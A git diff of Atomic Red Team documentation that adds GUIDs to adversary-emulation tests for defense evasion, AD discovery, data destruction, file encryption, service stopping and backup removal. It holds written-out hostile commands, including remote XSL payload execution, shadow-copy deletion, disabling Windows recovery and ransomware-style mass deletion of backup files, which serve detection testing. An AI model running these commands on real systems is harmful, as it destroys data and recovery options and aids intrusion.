## Atomic Test #2 - MSXSL Bypass using remote files -Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. +auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 + +Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml| | xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl| @@ -114,15 +118,17 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
## Atomic Test #3 - WMIC bypass using local XSL file -Executes the code specified within a XSL script using a local payload. +auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 + +Executes the code specified within a XSL script using a local payload. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | wmic_command | WMI command to execute using wmic.exe | string | process list| | local_xsl_file | Location of the test XSL script file on the local filesystem. | path | PathToAtomicsFolder\T1220\src\wmicscript.xsl| @@ -142,7 +148,7 @@ wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" ##### Description: XSL file must exist on disk at specified location (#{local_xsl_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} +if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -157,15 +163,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - WMIC bypass using remote XSL file -Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. +auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b + +Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl| | wmic_command | WMI command to execute using wmic.exe | string | process list| diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index 9f9d5708..3c8a6061 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,18 +16,20 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection + +auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d + Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| @@ -46,7 +48,7 @@ start #{docx_file} ##### Description: ##### Check Prereq Commands: ```powershell - + ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index def6c2c7..3091fc0d 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -22,16 +22,18 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as
## Atomic Test #1 - Take ownership using takeown utility + +auto_generated_guid: 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 + Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | %temp%\T1222.001_takeown_folder| @@ -50,7 +52,7 @@ takeown.exe /f #{file_folder_to_own} /r ##### Description: Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -66,17 +68,19 @@ echo T1222.001_takeown2 >> #{file_folder_to_own}\T1222.001_takeown2.txt
## Atomic Test #2 - cacls - Grant permission to specified user or group recursively + +auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 + Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files" will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_or_folder | Path of the file or folder to change permissions. | path | %temp%\T1222.001_cacls| | user_or_group | User or group to allow full control | string | Everyone| @@ -96,7 +100,7 @@ icacls.exe #{file_or_folder} /grant #{user_or_group}:F ##### Description: Test requrires a file to modify to be located at (#{file_or_folder}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -112,16 +116,18 @@ echo T1222.001_cacls2 >> #{file_or_folder}\T1222.001_cacls2.txt
## Atomic Test #3 - attrib - Remove read-only attribute + +auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 + Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib| @@ -140,7 +146,7 @@ attrib.exe -r #{file_or_folder}\*.* /s ##### Description: Test requrires a file to modify to be located at (#{file_or_folder}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -158,16 +164,18 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #4 - attrib - hide file + +auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c + Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib_2| @@ -194,7 +202,7 @@ rmdir #{file_or_folder} ##### Description: Test requires a file to modify to be located at (#{file_or_folder}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -210,18 +218,20 @@ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style + +auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 + Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls "C:\*" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\*" if you prefer. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| | file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt| @@ -245,7 +255,7 @@ icacls '#{path}' /restore #{file_path} /q >nul 2>&1 ##### Description: Backup of original folder permissions should exist (for use in cleanup commands) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index 607a4344..d433f301 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -30,15 +30,17 @@ Adversarial may use these commands to make themselves the owner of files and dir
## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) -Changes a file or folder's permissions using chmod and a specified numeric mode. +auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 + +Changes a file or folder's permissions using chmod and a specified numeric mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | numeric_mode | Specified numeric mode value | string | 755| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -60,15 +62,17 @@ chmod #{numeric_mode} #{file_or_folder}
## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) -Changes a file or folder's permissions using chmod and a specified symbolic mode. +auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 + +Changes a file or folder's permissions using chmod and a specified symbolic mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | symbolic_mode | Specified symbolic mode value | string | a+w| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -90,15 +94,17 @@ chmod #{symbolic_mode} #{file_or_folder}
## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively -Changes a file or folder's permissions recursively using chmod and a specified numeric mode. +auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 + +Changes a file or folder's permissions recursively using chmod and a specified numeric mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | numeric_mode | Specified numeric mode value | string | 755| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -120,15 +126,17 @@ chmod #{numeric_mode} #{file_or_folder} -R
## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively -Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. +auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f + +Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | symbolic_mode | Specified symbolic mode value | string | a+w| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -150,15 +158,17 @@ chmod #{symbolic_mode} #{file_or_folder} -R
## Atomic Test #5 - chown - Change file or folder ownership and group -Changes a file or folder's ownership and group information using chown. +auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 + +Changes a file or folder's ownership and group information using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml| @@ -181,15 +191,17 @@ chown #{owner}:#{group} #{file_or_folder}
## Atomic Test #6 - chown - Change file or folder ownership and group recursively -Changes a file or folder's ownership and group information recursively using chown. +auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 + +Changes a file or folder's ownership and group information recursively using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -212,15 +224,17 @@ chown #{owner}:#{group} #{file_or_folder} -R
## Atomic Test #7 - chown - Change file or folder mode ownership only -Changes a file or folder's ownership only using chown. +auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 + +Changes a file or folder's ownership only using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml| @@ -242,15 +256,17 @@ chown #{owner} #{file_or_folder}
## Atomic Test #8 - chown - Change file or folder ownership recursively -Changes a file or folder's ownership only recursively using chown. +auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 + +Changes a file or folder's ownership only recursively using chown. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | owner | Username of desired owner | string | root| | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002| @@ -272,16 +288,18 @@ chown #{owner} #{file_or_folder} -R
## Atomic Test #9 - chattr - Remove immutable file attribute + +auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f + Remove's a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_modify | Path of the file | path | /var/spool/cron/root| diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index f5d5b0ab..3d3deafa 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -18,9 +18,11 @@
## Atomic Test #1 - Windows - Discover domain trusts with dsquery + +auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f + Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role. - **Supported Platforms:** Windows @@ -43,10 +45,12 @@ dsquery * -filter "(objectClass=trustedDomain)" -attr *
## Atomic Test #2 - Windows - Discover domain trusts with nltest + +auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe + Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family. - **Supported Platforms:** Windows @@ -67,7 +71,7 @@ nltest /domain_trusts ##### Description: nltest.exe from RSAT must be present on disk ##### Check Prereq Commands: ```cmd -WHERE nltest.exe >NUL 2>&1 +WHERE nltest.exe >NUL 2>&1 ``` ##### Get Prereq Commands: ```cmd @@ -81,9 +85,11 @@ echo Sorry RSAT must be installed manually
## Atomic Test #3 - Powershell enumerate domains and forests + +auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 + Use powershell to enumerate AD information. Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role. - **Supported Platforms:** Windows @@ -108,7 +114,7 @@ Get-ADGroupMember Administrators -Recursive ##### Description: PowerView PowerShell script must exist on disk ##### Check Prereq Commands: ```powershell -if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} +if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -117,7 +123,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit ##### Description: RSAT PowerShell AD admin cmdlets must be installed ##### Check Prereq Commands: ```powershell -if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } +if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -131,16 +137,18 @@ Write-Host "Sorry RSAT must be installed manually"
## Atomic Test #4 - Adfind - Enumerate Active Directory OUs + +auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -159,7 +167,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -173,16 +181,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #5 - Adfind - Enumerate Active Directory Trusts + +auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -201,7 +211,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 82bfd6ff..32873bd4 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -18,16 +18,18 @@ In cloud environments, adversaries may leverage access to delete cloud storage,
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete + +auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2 + Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in the powershell session along with other information about the file that was deleted. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe| | file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt| @@ -48,7 +50,7 @@ Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" ##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} +if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -64,16 +66,18 @@ Remove-Item $env:TEMP\SDelete.zip -Force
## Atomic Test #2 - macOS/Linux - Overwrite file with DD + +auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 + Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | overwrite_source | Path of data source to overwrite with | Path | /dev/zero| | file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog| diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index b38a9f1f..bad8ac5a 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -20,15 +20,17 @@ In cloud environments, storage objects within compromised accounts may also be e
## Atomic Test #1 - Encrypt files using gpg (Linux) -Uses gpg to encrypt a file +auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 + +Uses gpg to encrypt a file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd| | encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.gpg| @@ -54,7 +56,7 @@ rm #{encrypted_file_path} ##### Description: Finds where gpg is located ##### Check Prereq Commands: ```bash -which_gpg=`which gpg` +which_gpg=`which gpg` ``` ##### Get Prereq Commands: ```bash @@ -68,15 +70,17 @@ which_gpg=`which gpg`
## Atomic Test #2 - Encrypt files using 7z (Linux) -Uses 7z to encrypt a file +auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad + +Uses 7z to encrypt a file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd| | encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip| @@ -102,7 +106,7 @@ rm #{encrypted_file_path} ##### Description: Finds where 7z is located ##### Check Prereq Commands: ```bash -which_7z=`which 7z` +which_7z=`which 7z` ``` ##### Get Prereq Commands: ```bash @@ -116,15 +120,17 @@ which_7z=`which 7z`
## Atomic Test #3 - Encrypt files using ccrypt (Linux) -Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. +auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f + +Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | cped_file_path | path where you want your copied file to be | Path | /tmp/passwd| | root_input_file_path | path to the file that you want to be encrypted if you are root user | Path | /etc/passwd| @@ -152,7 +158,7 @@ if [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; els ```bash which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` -if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi +if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi ``` ##### Get Prereq Commands: ```bash @@ -166,15 +172,17 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
## Atomic Test #4 - Encrypt files using openssl (Linux) -Uses openssl to encrypt a file +auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 + +Uses openssl to encrypt a file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | private_key_path | path to the private key | Path | /tmp/key.pem| | public_key_path | path to the public key | Path | /tmp/pub.pem| @@ -204,7 +212,7 @@ rm #{encrypted_file_path} ##### Description: Finds where openssl is located ##### Check Prereq Commands: ```bash -which_openssl=`which openssl` +which_openssl=`which openssl` ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index c3d686e0..4658beaa 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -16,17 +16,19 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller + +auto_generated_guid: 21dfb440-830d-4c86-a3e5-2a491d5a8d04 + Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be started by running the cleanup command. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of a service to stop | String | spooler| @@ -51,17 +53,19 @@ sc.exe start #{service_name} >nul 2>&1
## Atomic Test #2 - Windows - Stop service using net.exe + +auto_generated_guid: 41274289-ec9c-4213-bea4-e43c4aa57954 + Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of a service to stop | String | spooler| @@ -86,18 +90,20 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #3 - Windows - Stop service by killing process + +auto_generated_guid: f3191b84-c38b-400b-867e-3a217a27795f + Stops a specified service killng the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_name | Name of a process to kill | String | spoolsv.exe| diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 99ce741a..c239f5bc 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -29,13 +29,15 @@ A number of native Windows utilities have been used by adversaries to disable or
## Atomic Test #1 - Windows - Delete Volume Shadow Copies + +auto_generated_guid: 43819286-91a9-4369-90ed-d31fb4da2c01 + Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11) - **Supported Platforms:** Windows @@ -56,7 +58,7 @@ vssadmin.exe delete shadows /all /quiet ##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. ##### Check Prereq Commands: ```powershell -if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } +if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -70,9 +72,11 @@ vssadmin.exe create shadow /for=c:
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI + +auto_generated_guid: 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 + Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Shadow copies can only be created on Windows server or Windows 8. - **Supported Platforms:** Windows @@ -95,9 +99,11 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog + +auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c + Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session. - **Supported Platforms:** Windows @@ -120,9 +126,11 @@ wbadmin delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair + +auto_generated_guid: cf21060a-80b3-4238-a595-22525de4ab81 + Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the powershell session. - **Supported Platforms:** Windows @@ -151,11 +159,13 @@ bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell + +auto_generated_guid: 39a295ca-7059-4a88-86f6-09556c1211e7 + Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil. Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution there may be no output displayed. - **Supported Platforms:** Windows @@ -178,9 +188,11 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
## Atomic Test #6 - Windows - Delete Backup Files + +auto_generated_guid: 6b1dbaf6-cc8a-4ea6-891f-6058569653bf + Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try to delete files from around the system. - **Supported Platforms:** Windows @@ -203,8 +215,10 @@ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\back
